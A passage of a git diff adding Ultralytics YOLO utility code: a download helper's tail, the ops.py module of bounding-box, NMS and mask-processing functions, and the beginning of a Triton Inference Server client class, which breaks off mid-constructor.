+ + Example: + ```python + download("https://ultralytics.com/assets/example.zip", dir="path/to/dir", unzip=True) + ``` + """ + dir = Path(dir) + dir.mkdir(parents=True, exist_ok=True) # make directory + if threads > 1: + with ThreadPool(threads) as pool: + pool.map( + lambda x: safe_download( + url=x[0], + dir=x[1], + unzip=unzip, + delete=delete, + curl=curl, + retry=retry, + exist_ok=exist_ok, + progress=threads <= 1, + ), + zip(url, repeat(dir)), + ) + pool.close() + pool.join() + else: + for u in [url] if isinstance(url, (str, Path)) else url: + safe_download(url=u, dir=dir, unzip=unzip, delete=delete, curl=curl, retry=retry, exist_ok=exist_ok) diff --git a/2024.ultralytics/v8.3.46/utils/ops.py b/2024.ultralytics/v8.3.46/utils/ops.py new file mode 100644 index 0000000..9a05b3a --- /dev/null +++ b/2024.ultralytics/v8.3.46/utils/ops.py @@ -0,0 +1,847 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import contextlib +import math +import re +import time + +import cv2 +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.utils import LOGGER +from ultralytics.utils.metrics import batch_probiou + + +class Profile(contextlib.ContextDecorator): + """ + YOLOv8 Profile class. Use as a decorator with @Profile() or as a context manager with 'with Profile():'. + + Example: + ```python + from ultralytics.utils.ops import Profile + + with Profile(device=device) as dt: + pass # slow operation here + + print(dt) # prints "Elapsed time is 9.5367431640625e-07 s" + ``` + """ + + def __init__(self, t=0.0, device: torch.device = None): + """ + Initialize the Profile class. + + Args: + t (float): Initial time. Defaults to 0.0. + device (torch.device): Devices used for model inference. Defaults to None (cpu). 
+ """ + self.t = t + self.device = device + self.cuda = bool(device and str(device).startswith("cuda")) + + def __enter__(self): + """Start timing.""" + self.start = self.time() + return self + + def __exit__(self, type, value, traceback): # noqa + """Stop timing.""" + self.dt = self.time() - self.start # delta-time + self.t += self.dt # accumulate dt + + def __str__(self): + """Returns a human-readable string representing the accumulated elapsed time in the profiler.""" + return f"Elapsed time is {self.t} s" + + def time(self): + """Get current time.""" + if self.cuda: + torch.cuda.synchronize(self.device) + return time.time() + + +def segment2box(segment, width=640, height=640): + """ + Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy). + + Args: + segment (torch.Tensor): the segment label + width (int): the width of the image. Defaults to 640 + height (int): The height of the image. Defaults to 640 + + Returns: + (np.ndarray): the minimum and maximum x and y values of the segment. + """ + x, y = segment.T # segment xy + x = x.clip(0, width) + y = y.clip(0, height) + return ( + np.array([x.min(), y.min(), x.max(), y.max()], dtype=segment.dtype) + if any(x) + else np.zeros(4, dtype=segment.dtype) + ) # xyxy + + +def scale_boxes(img1_shape, boxes, img0_shape, ratio_pad=None, padding=True, xywh=False): + """ + Rescales bounding boxes (in the format of xyxy by default) from the shape of the image they were originally + specified in (img1_shape) to the shape of a different image (img0_shape). + + Args: + img1_shape (tuple): The shape of the image that the bounding boxes are for, in the format of (height, width). + boxes (torch.Tensor): the bounding boxes of the objects in the image, in the format of (x1, y1, x2, y2) + img0_shape (tuple): the shape of the target image, in the format of (height, width). + ratio_pad (tuple): a tuple of (ratio, pad) for scaling the boxes. 
If not provided, the ratio and pad will be + calculated based on the size difference between the two images. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + xywh (bool): The box format is xywh or not, default=False. + + Returns: + boxes (torch.Tensor): The scaled bounding boxes, in the format of (x1, y1, x2, y2) + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = ( + round((img1_shape[1] - img0_shape[1] * gain) / 2 - 0.1), + round((img1_shape[0] - img0_shape[0] * gain) / 2 - 0.1), + ) # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + boxes[..., 0] -= pad[0] # x padding + boxes[..., 1] -= pad[1] # y padding + if not xywh: + boxes[..., 2] -= pad[0] # x padding + boxes[..., 3] -= pad[1] # y padding + boxes[..., :4] /= gain + return clip_boxes(boxes, img0_shape) + + +def make_divisible(x, divisor): + """ + Returns the nearest number that is divisible by the given divisor. + + Args: + x (int): The number to make divisible. + divisor (int | torch.Tensor): The divisor. + + Returns: + (int): The nearest number divisible by the divisor. + """ + if isinstance(divisor, torch.Tensor): + divisor = int(divisor.max()) # to int + return math.ceil(x / divisor) * divisor + + +def nms_rotated(boxes, scores, threshold=0.45): + """ + NMS for oriented bounding boxes using probiou and fast-nms. + + Args: + boxes (torch.Tensor): Rotated bounding boxes, shape (N, 5), format xywhr. + scores (torch.Tensor): Confidence scores, shape (N,). + threshold (float, optional): IoU threshold. Defaults to 0.45. + + Returns: + (torch.Tensor): Indices of boxes to keep after NMS. 
+ """ + if len(boxes) == 0: + return np.empty((0,), dtype=np.int8) + sorted_idx = torch.argsort(scores, descending=True) + boxes = boxes[sorted_idx] + ious = batch_probiou(boxes, boxes).triu_(diagonal=1) + pick = torch.nonzero(ious.max(dim=0)[0] < threshold).squeeze_(-1) + return sorted_idx[pick] + + +def non_max_suppression( + prediction, + conf_thres=0.25, + iou_thres=0.45, + classes=None, + agnostic=False, + multi_label=False, + labels=(), + max_det=300, + nc=0, # number of classes (optional) + max_time_img=0.05, + max_nms=30000, + max_wh=7680, + in_place=True, + rotated=False, +): + """ + Perform non-maximum suppression (NMS) on a set of boxes, with support for masks and multiple labels per box. + + Args: + prediction (torch.Tensor): A tensor of shape (batch_size, num_classes + 4 + num_masks, num_boxes) + containing the predicted boxes, classes, and masks. The tensor should be in the format + output by a model, such as YOLO. + conf_thres (float): The confidence threshold below which boxes will be filtered out. + Valid values are between 0.0 and 1.0. + iou_thres (float): The IoU threshold below which boxes will be filtered out during NMS. + Valid values are between 0.0 and 1.0. + classes (List[int]): A list of class indices to consider. If None, all classes will be considered. + agnostic (bool): If True, the model is agnostic to the number of classes, and all + classes will be considered as one. + multi_label (bool): If True, each box may have multiple labels. + labels (List[List[Union[int, float, torch.Tensor]]]): A list of lists, where each inner + list contains the apriori labels for a given image. The list should be in the format + output by a dataloader, with each label being a tuple of (class_index, x1, y1, x2, y2). + max_det (int): The maximum number of boxes to keep after NMS. + nc (int, optional): The number of classes output by the model. Any indices after this will be considered masks. 
+ max_time_img (float): The maximum time (seconds) for processing one image. + max_nms (int): The maximum number of boxes into torchvision.ops.nms(). + max_wh (int): The maximum box width and height in pixels. + in_place (bool): If True, the input prediction tensor will be modified in place. + rotated (bool): If Oriented Bounding Boxes (OBB) are being passed for NMS. + + Returns: + (List[torch.Tensor]): A list of length batch_size, where each element is a tensor of + shape (num_boxes, 6 + num_masks) containing the kept boxes, with columns + (x1, y1, x2, y2, confidence, class, mask1, mask2, ...). + """ + import torchvision # scope for faster 'import ultralytics' + + # Checks + assert 0 <= conf_thres <= 1, f"Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0" + assert 0 <= iou_thres <= 1, f"Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0" + if isinstance(prediction, (list, tuple)): # YOLOv8 model in validation model, output = (inference_out, loss_out) + prediction = prediction[0] # select only inference output + if classes is not None: + classes = torch.tensor(classes, device=prediction.device) + + if prediction.shape[-1] == 6: # end-to-end model (BNC, i.e. 1,300,6) + output = [pred[pred[:, 4] > conf_thres][:max_det] for pred in prediction] + if classes is not None: + output = [pred[(pred[:, 5:6] == classes).any(1)] for pred in output] + return output + + bs = prediction.shape[0] # batch size (BCN, i.e. 
1,84,6300) + nc = nc or (prediction.shape[1] - 4) # number of classes + nm = prediction.shape[1] - nc - 4 # number of masks + mi = 4 + nc # mask start index + xc = prediction[:, 4:mi].amax(1) > conf_thres # candidates + + # Settings + # min_wh = 2 # (pixels) minimum box width and height + time_limit = 2.0 + max_time_img * bs # seconds to quit after + multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img) + + prediction = prediction.transpose(-1, -2) # shape(1,84,6300) to shape(1,6300,84) + if not rotated: + if in_place: + prediction[..., :4] = xywh2xyxy(prediction[..., :4]) # xywh to xyxy + else: + prediction = torch.cat((xywh2xyxy(prediction[..., :4]), prediction[..., 4:]), dim=-1) # xywh to xyxy + + t = time.time() + output = [torch.zeros((0, 6 + nm), device=prediction.device)] * bs + for xi, x in enumerate(prediction): # image index, image inference + # Apply constraints + # x[((x[:, 2:4] < min_wh) | (x[:, 2:4] > max_wh)).any(1), 4] = 0 # width-height + x = x[xc[xi]] # confidence + + # Cat apriori labels if autolabelling + if labels and len(labels[xi]) and not rotated: + lb = labels[xi] + v = torch.zeros((len(lb), nc + nm + 4), device=x.device) + v[:, :4] = xywh2xyxy(lb[:, 1:5]) # box + v[range(len(lb)), lb[:, 0].long() + 4] = 1.0 # cls + x = torch.cat((x, v), 0) + + # If none remain process next image + if not x.shape[0]: + continue + + # Detections matrix nx6 (xyxy, conf, cls) + box, cls, mask = x.split((4, nc, nm), 1) + + if multi_label: + i, j = torch.where(cls > conf_thres) + x = torch.cat((box[i], x[i, 4 + j, None], j[:, None].float(), mask[i]), 1) + else: # best class only + conf, j = cls.max(1, keepdim=True) + x = torch.cat((box, conf, j.float(), mask), 1)[conf.view(-1) > conf_thres] + + # Filter by class + if classes is not None: + x = x[(x[:, 5:6] == classes).any(1)] + + # Check shape + n = x.shape[0] # number of boxes + if not n: # no boxes + continue + if n > max_nms: # excess boxes + x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort 
by confidence and remove excess boxes + + # Batched NMS + c = x[:, 5:6] * (0 if agnostic else max_wh) # classes + scores = x[:, 4] # scores + if rotated: + boxes = torch.cat((x[:, :2] + c, x[:, 2:4], x[:, -1:]), dim=-1) # xywhr + i = nms_rotated(boxes, scores, iou_thres) + else: + boxes = x[:, :4] + c # boxes (offset by class) + i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS + i = i[:max_det] # limit detections + + # # Experimental + # merge = False # use merge-NMS + # if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean) + # # Update boxes as boxes(i,4) = weights(i,n) * boxes(n,4) + # from .metrics import box_iou + # iou = box_iou(boxes[i], boxes) > iou_thres # IoU matrix + # weights = iou * scores[None] # box weights + # x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes + # redundant = True # require redundant detections + # if redundant: + # i = i[iou.sum(1) > 1] # require redundancy + + output[xi] = x[i] + if (time.time() - t) > time_limit: + LOGGER.warning(f"WARNING ⚠️ NMS time limit {time_limit:.3f}s exceeded") + break # time limit exceeded + + return output + + +def clip_boxes(boxes, shape): + """ + Takes a list of bounding boxes and a shape (height, width) and clips the bounding boxes to the shape. + + Args: + boxes (torch.Tensor): The bounding boxes to clip. + shape (tuple): The shape of the image. + + Returns: + (torch.Tensor | numpy.ndarray): The clipped boxes. 
+ """ + if isinstance(boxes, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + boxes[..., 0] = boxes[..., 0].clamp(0, shape[1]) # x1 + boxes[..., 1] = boxes[..., 1].clamp(0, shape[0]) # y1 + boxes[..., 2] = boxes[..., 2].clamp(0, shape[1]) # x2 + boxes[..., 3] = boxes[..., 3].clamp(0, shape[0]) # y2 + else: # np.array (faster grouped) + boxes[..., [0, 2]] = boxes[..., [0, 2]].clip(0, shape[1]) # x1, x2 + boxes[..., [1, 3]] = boxes[..., [1, 3]].clip(0, shape[0]) # y1, y2 + return boxes + + +def clip_coords(coords, shape): + """ + Clip line coordinates to the image boundaries. + + Args: + coords (torch.Tensor | numpy.ndarray): A list of line coordinates. + shape (tuple): A tuple of integers representing the size of the image in the format (height, width). + + Returns: + (torch.Tensor | numpy.ndarray): Clipped coordinates + """ + if isinstance(coords, torch.Tensor): # faster individually (WARNING: inplace .clamp_() Apple MPS bug) + coords[..., 0] = coords[..., 0].clamp(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clamp(0, shape[0]) # y + else: # np.array (faster grouped) + coords[..., 0] = coords[..., 0].clip(0, shape[1]) # x + coords[..., 1] = coords[..., 1].clip(0, shape[0]) # y + return coords + + +def scale_image(masks, im0_shape, ratio_pad=None): + """ + Takes a mask, and resizes it to the original image size. + + Args: + masks (np.ndarray): Resized and padded masks/images, [h, w, num]/[h, w, 3]. + im0_shape (tuple): The original image shape. + ratio_pad (tuple): The ratio of the padding to the original image. + + Returns: + masks (np.ndarray): The masks that are being returned with shape [h, w, num]. 
+ """ + # Rescale coordinates (xyxy) from im1_shape to im0_shape + im1_shape = masks.shape + if im1_shape[:2] == im0_shape[:2]: + return masks + if ratio_pad is None: # calculate from im0_shape + gain = min(im1_shape[0] / im0_shape[0], im1_shape[1] / im0_shape[1]) # gain = old / new + pad = (im1_shape[1] - im0_shape[1] * gain) / 2, (im1_shape[0] - im0_shape[0] * gain) / 2 # wh padding + else: + # gain = ratio_pad[0][0] + pad = ratio_pad[1] + top, left = int(pad[1]), int(pad[0]) # y, x + bottom, right = int(im1_shape[0] - pad[1]), int(im1_shape[1] - pad[0]) + + if len(masks.shape) < 2: + raise ValueError(f'"len of masks shape" should be 2 or 3, but got {len(masks.shape)}') + masks = masks[top:bottom, left:right] + masks = cv2.resize(masks, (im0_shape[1], im0_shape[0])) + if len(masks.shape) == 2: + masks = masks[:, :, None] + + return masks + + +def xyxy2xywh(x): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + y[..., 0] = (x[..., 0] + x[..., 2]) / 2 # x center + y[..., 1] = (x[..., 1] + x[..., 3]) / 2 # y center + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def xywh2xyxy(x): + """ + Convert bounding box coordinates from (x, y, width, height) format to (x1, y1, x2, y2) format where (x1, y1) is the + top-left corner and (x2, y2) is the bottom-right corner. Note: ops per 2 channels faster than per channel. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x, y, width, height) format. 
+ + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x1, y1, x2, y2) format. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + xy = x[..., :2] # centers + wh = x[..., 2:] / 2 # half width-height + y[..., :2] = xy - wh # top left xy + y[..., 2:] = xy + wh # bottom right xy + return y + + +def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0): + """ + Convert normalized bounding box coordinates to pixel coordinates. + + Args: + x (np.ndarray | torch.Tensor): The bounding box coordinates. + w (int): Width of the image. Defaults to 640 + h (int): Height of the image. Defaults to 640 + padw (int): Padding width. Defaults to 0 + padh (int): Padding height. Defaults to 0 + Returns: + y (np.ndarray | torch.Tensor): The coordinates of the bounding box in the format [x1, y1, x2, y2] where + x1,y1 is the top-left corner, x2,y2 is the bottom-right corner of the bounding box. + """ + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + y[..., 0] = w * (x[..., 0] - x[..., 2] / 2) + padw # top left x + y[..., 1] = h * (x[..., 1] - x[..., 3] / 2) + padh # top left y + y[..., 2] = w * (x[..., 0] + x[..., 2] / 2) + padw # bottom right x + y[..., 3] = h * (x[..., 1] + x[..., 3] / 2) + padh # bottom right y + return y + + +def xyxy2xywhn(x, w=640, h=640, clip=False, eps=0.0): + """ + Convert bounding box coordinates from (x1, y1, x2, y2) format to (x, y, width, height, normalized) format. x, y, + width and height are normalized to image dimensions. + + Args: + x (np.ndarray | torch.Tensor): The input bounding box coordinates in (x1, y1, x2, y2) format. + w (int): The width of the image. Defaults to 640 + h (int): The height of the image. Defaults to 640 + clip (bool): If True, the boxes will be clipped to the image boundaries. 
Defaults to False + eps (float): The minimum value of the box's width and height. Defaults to 0.0 + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in (x, y, width, height, normalized) format + """ + if clip: + x = clip_boxes(x, (h - eps, w - eps)) + assert x.shape[-1] == 4, f"input shape last dimension expected 4 but input shape is {x.shape}" + y = empty_like(x) # faster than clone/copy + y[..., 0] = ((x[..., 0] + x[..., 2]) / 2) / w # x center + y[..., 1] = ((x[..., 1] + x[..., 3]) / 2) / h # y center + y[..., 2] = (x[..., 2] - x[..., 0]) / w # width + y[..., 3] = (x[..., 3] - x[..., 1]) / h # height + return y + + +def xywh2ltwh(x): + """ + Convert the bounding box format from [x, y, w, h] to [x1, y1, w, h], where x1, y1 are the top-left coordinates. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding box coordinates in the xywh format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] - x[..., 2] / 2 # top left x + y[..., 1] = x[..., 1] - x[..., 3] / 2 # top left y + return y + + +def xyxy2ltwh(x): + """ + Convert nx4 bounding boxes from [x1, y1, x2, y2] to [x1, y1, w, h], where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): The input tensor with the bounding boxes coordinates in the xyxy format + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xyltwh format. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] - x[..., 0] # width + y[..., 3] = x[..., 3] - x[..., 1] # height + return y + + +def ltwh2xywh(x): + """ + Convert nx4 boxes from [x1, y1, w, h] to [x, y, w, h] where xy1=top-left, xy=center. + + Args: + x (torch.Tensor): the input tensor + + Returns: + y (np.ndarray | torch.Tensor): The bounding box coordinates in the xywh format. 
+ """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 0] = x[..., 0] + x[..., 2] / 2 # center x + y[..., 1] = x[..., 1] + x[..., 3] / 2 # center y + return y + + +def xyxyxyxy2xywhr(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xy1, xy2, xy3, xy4] to [xywh, rotation]. Rotation values are + returned in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Input box corners [xy1, xy2, xy3, xy4] of shape (n, 8). + + Returns: + (numpy.ndarray | torch.Tensor): Converted data in [cx, cy, w, h, rotation] format of shape (n, 5). + """ + is_torch = isinstance(x, torch.Tensor) + points = x.cpu().numpy() if is_torch else x + points = points.reshape(len(x), -1, 2) + rboxes = [] + for pts in points: + # NOTE: Use cv2.minAreaRect to get accurate xywhr, + # especially some objects are cut off by augmentations in dataloader. + (cx, cy), (w, h), angle = cv2.minAreaRect(pts) + rboxes.append([cx, cy, w, h, angle / 180 * np.pi]) + return torch.tensor(rboxes, device=x.device, dtype=x.dtype) if is_torch else np.asarray(rboxes) + + +def xywhr2xyxyxyxy(x): + """ + Convert batched Oriented Bounding Boxes (OBB) from [xywh, rotation] to [xy1, xy2, xy3, xy4]. Rotation values should + be in radians from 0 to pi/2. + + Args: + x (numpy.ndarray | torch.Tensor): Boxes in [cx, cy, w, h, rotation] format of shape (n, 5) or (b, n, 5). + + Returns: + (numpy.ndarray | torch.Tensor): Converted corner points of shape (n, 4, 2) or (b, n, 4, 2). 
+ """ + cos, sin, cat, stack = ( + (torch.cos, torch.sin, torch.cat, torch.stack) + if isinstance(x, torch.Tensor) + else (np.cos, np.sin, np.concatenate, np.stack) + ) + + ctr = x[..., :2] + w, h, angle = (x[..., i : i + 1] for i in range(2, 5)) + cos_value, sin_value = cos(angle), sin(angle) + vec1 = [w / 2 * cos_value, w / 2 * sin_value] + vec2 = [-h / 2 * sin_value, h / 2 * cos_value] + vec1 = cat(vec1, -1) + vec2 = cat(vec2, -1) + pt1 = ctr + vec1 + vec2 + pt2 = ctr + vec1 - vec2 + pt3 = ctr - vec1 - vec2 + pt4 = ctr - vec1 + vec2 + return stack([pt1, pt2, pt3, pt4], -2) + + +def ltwh2xyxy(x): + """ + It converts the bounding box from [x1, y1, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right. + + Args: + x (np.ndarray | torch.Tensor): the input image + + Returns: + y (np.ndarray | torch.Tensor): the xyxy coordinates of the bounding boxes. + """ + y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x) + y[..., 2] = x[..., 2] + x[..., 0] # width + y[..., 3] = x[..., 3] + x[..., 1] # height + return y + + +def segments2boxes(segments): + """ + It converts segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh). + + Args: + segments (list): list of segments, each segment is a list of points, each point is a list of x, y coordinates + + Returns: + (np.ndarray): the xywh coordinates of the bounding boxes. + """ + boxes = [] + for s in segments: + x, y = s.T # segment xy + boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy + return xyxy2xywh(np.array(boxes)) # cls, xywh + + +def resample_segments(segments, n=1000): + """ + Inputs a list of segments (n,2) and returns a list of segments (n,2) up-sampled to n points each. + + Args: + segments (list): a list of (n,2) arrays, where n is the number of points in the segment. + n (int): number of points to resample the segment to. Defaults to 1000 + + Returns: + segments (list): the resampled segments. 
+ """ + for i, s in enumerate(segments): + s = np.concatenate((s, s[0:1, :]), axis=0) + x = np.linspace(0, len(s) - 1, n - len(s) if len(s) < n else n) + xp = np.arange(len(s)) + x = np.insert(x, np.searchsorted(x, xp), xp) if len(s) < n else x + segments[i] = ( + np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)], dtype=np.float32).reshape(2, -1).T + ) # segment xy + return segments + + +def crop_mask(masks, boxes): + """ + It takes a mask and a bounding box, and returns a mask that is cropped to the bounding box. + + Args: + masks (torch.Tensor): [n, h, w] tensor of masks + boxes (torch.Tensor): [n, 4] tensor of bbox coordinates in relative point form + + Returns: + (torch.Tensor): The masks are being cropped to the bounding box. + """ + _, h, w = masks.shape + x1, y1, x2, y2 = torch.chunk(boxes[:, :, None], 4, 1) # x1 shape(n,1,1) + r = torch.arange(w, device=masks.device, dtype=x1.dtype)[None, None, :] # rows shape(1,1,w) + c = torch.arange(h, device=masks.device, dtype=x1.dtype)[None, :, None] # cols shape(1,h,1) + + return masks * ((r >= x1) * (r < x2) * (c >= y1) * (c < y2)) + + +def process_mask(protos, masks_in, bboxes, shape, upsample=False): + """ + Apply masks to bounding boxes using the output of the mask head. + + Args: + protos (torch.Tensor): A tensor of shape [mask_dim, mask_h, mask_w]. + masks_in (torch.Tensor): A tensor of shape [n, mask_dim], where n is the number of masks after NMS. + bboxes (torch.Tensor): A tensor of shape [n, 4], where n is the number of masks after NMS. + shape (tuple): A tuple of integers representing the size of the input image in the format (h, w). + upsample (bool): A flag to indicate whether to upsample the mask to the original image size. Default is False. + + Returns: + (torch.Tensor): A binary mask tensor of shape [n, h, w], where n is the number of masks after NMS, and h and w + are the height and width of the input image. The mask is applied to the bounding boxes. 
+ """ + c, mh, mw = protos.shape # CHW + ih, iw = shape + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) # CHW + width_ratio = mw / iw + height_ratio = mh / ih + + downsampled_bboxes = bboxes.clone() + downsampled_bboxes[:, 0] *= width_ratio + downsampled_bboxes[:, 2] *= width_ratio + downsampled_bboxes[:, 3] *= height_ratio + downsampled_bboxes[:, 1] *= height_ratio + + masks = crop_mask(masks, downsampled_bboxes) # CHW + if upsample: + masks = F.interpolate(masks[None], shape, mode="bilinear", align_corners=False)[0] # CHW + return masks.gt_(0.0) + + +def process_mask_native(protos, masks_in, bboxes, shape): + """ + It takes the output of the mask head, and crops it after upsampling to the bounding boxes. + + Args: + protos (torch.Tensor): [mask_dim, mask_h, mask_w] + masks_in (torch.Tensor): [n, mask_dim], n is number of masks after nms. + bboxes (torch.Tensor): [n, 4], n is number of masks after nms. + shape (tuple): The size of the input image (h,w). + + Returns: + masks (torch.Tensor): The returned masks with dimensions [h, w, n]. + """ + c, mh, mw = protos.shape # CHW + masks = (masks_in @ protos.float().view(c, -1)).view(-1, mh, mw) + masks = scale_masks(masks[None], shape)[0] # CHW + masks = crop_mask(masks, bboxes) # CHW + return masks.gt_(0.0) + + +def scale_masks(masks, shape, padding=True): + """ + Rescale segment masks to shape. + + Args: + masks (torch.Tensor): (N, C, H, W). + shape (tuple): Height and width. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. 
+ """ + mh, mw = masks.shape[2:] + gain = min(mh / shape[0], mw / shape[1]) # gain = old / new + pad = [mw - shape[1] * gain, mh - shape[0] * gain] # wh padding + if padding: + pad[0] /= 2 + pad[1] /= 2 + top, left = (int(pad[1]), int(pad[0])) if padding else (0, 0) # y, x + bottom, right = (int(mh - pad[1]), int(mw - pad[0])) + masks = masks[..., top:bottom, left:right] + + masks = F.interpolate(masks, shape, mode="bilinear", align_corners=False) # NCHW + return masks + + +def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None, normalize=False, padding=True): + """ + Rescale segment coordinates (xy) from img1_shape to img0_shape. + + Args: + img1_shape (tuple): The shape of the image that the coords are from. + coords (torch.Tensor): the coords to be scaled of shape n,2. + img0_shape (tuple): the shape of the image that the segmentation is being applied to. + ratio_pad (tuple): the ratio of the image size to the padded image size. + normalize (bool): If True, the coordinates will be normalized to the range [0, 1]. Defaults to False. + padding (bool): If True, assuming the boxes is based on image augmented by yolo style. If False then do regular + rescaling. + + Returns: + coords (torch.Tensor): The scaled coordinates. + """ + if ratio_pad is None: # calculate from img0_shape + gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new + pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding + else: + gain = ratio_pad[0][0] + pad = ratio_pad[1] + + if padding: + coords[..., 0] -= pad[0] # x padding + coords[..., 1] -= pad[1] # y padding + coords[..., 0] /= gain + coords[..., 1] /= gain + coords = clip_coords(coords, img0_shape) + if normalize: + coords[..., 0] /= img0_shape[1] # width + coords[..., 1] /= img0_shape[0] # height + return coords + + +def regularize_rboxes(rboxes): + """ + Regularize rotated boxes in range [0, pi/2]. 
def masks2segments(masks, strategy="all"):
    """
    Convert a batch of masks (n, h, w) into a list of polygon segments (n entries of xy points).

    Args:
        masks (torch.Tensor): Masks of shape (n, h, w); values are cast to int and then uint8 before contour
            extraction.
        strategy (str): 'all' merges every external contour of a mask into one segment, 'largest' keeps only the
            contour with the most points. Defaults to 'all'.

    Returns:
        segments (List[np.ndarray]): One float32 array of shape (k, 2) per mask; shape (0, 2) when a mask has no
            contour.

    Raises:
        ValueError: If `strategy` is neither 'all' nor 'largest'.
    """
    # Fail early with a clear message; previously an unknown strategy left the raw contour tuple in place and
    # crashed later with an unrelated AttributeError on `.astype`.
    if strategy not in {"all", "largest"}:
        raise ValueError(f"strategy must be 'all' or 'largest', got {strategy!r}")

    segments = []
    for mask in masks.int().cpu().numpy().astype("uint8"):
        contours = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]
        if not contours:
            segment = np.zeros((0, 2))  # no segments found
        elif strategy == "largest":  # select the contour with the most points (first one on ties)
            segment = np.array(max(contours, key=len)).reshape(-1, 2)
        elif len(contours) == 1:
            segment = contours[0].reshape(-1, 2)
        else:  # merge and concatenate all segments
            # Imported only where needed so the simple paths do not pull in the data package
            from ultralytics.data.converter import merge_multi_segment

            segment = np.concatenate(merge_multi_segment([contour.reshape(-1, 2) for contour in contours]))
        segments.append(segment.astype("float32"))
    return segments
class TritonRemoteModel:
    """
    Client for interacting with a remote Triton Inference Server model.

    Attributes:
        endpoint (str): The name of the model on the Triton server.
        url (str): The URL of the Triton server.
        triton_client: The Triton client (either HTTP or gRPC).
        InferInput: The input class for the Triton client.
        InferRequestedOutput: The output request class for the Triton client.
        input_formats (List[str]): The data types of the model inputs.
        np_input_formats (List[type]): The numpy data types of the model inputs.
        input_names (List[str]): The names of the model inputs.
        output_names (List[str]): The names of the model outputs.
        metadata: The value parsed from the model config's 'metadata' parameter, or None when it is absent.
    """

    def __init__(self, url: str, endpoint: str = "", scheme: str = ""):
        """
        Initialize the TritonRemoteModel.

        Arguments may be provided individually or parsed from a collective 'url' argument of the form
            <scheme>://<netloc>/<endpoint>
        Only the first path component is used as the endpoint; any further components are ignored.

        Args:
            url (str): The URL of the Triton server.
            endpoint (str): The name of the model on the Triton server.
            scheme (str): The communication scheme ('http' or 'grpc'). Any value other than 'http' selects gRPC.

        Raises:
            KeyError: If a model input uses a data type other than TYPE_FP32, TYPE_FP16 or TYPE_UINT8.
            ValueError | SyntaxError: If the server-provided metadata string is not a plain Python literal.
        """
        if not endpoint and not scheme:  # Parse all args from URL string
            splits = urlsplit(url)
            endpoint = splits.path.strip("/").split("/")[0]
            scheme = splits.scheme
            url = splits.netloc

        self.endpoint = endpoint
        self.url = url

        # Choose the Triton client based on the communication scheme
        if scheme == "http":
            import tritonclient.http as client  # noqa

            self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False)
            config = self.triton_client.get_model_config(endpoint)
        else:
            import tritonclient.grpc as client  # noqa

            self.triton_client = client.InferenceServerClient(url=self.url, verbose=False, ssl=False)
            config = self.triton_client.get_model_config(endpoint, as_json=True)["config"]

        # Sort output names alphabetically, i.e. 'output0', 'output1', etc.
        config["output"] = sorted(config["output"], key=lambda x: x.get("name"))

        # Define model attributes
        type_map = {"TYPE_FP32": np.float32, "TYPE_FP16": np.float16, "TYPE_UINT8": np.uint8}
        self.InferRequestedOutput = client.InferRequestedOutput
        self.InferInput = client.InferInput
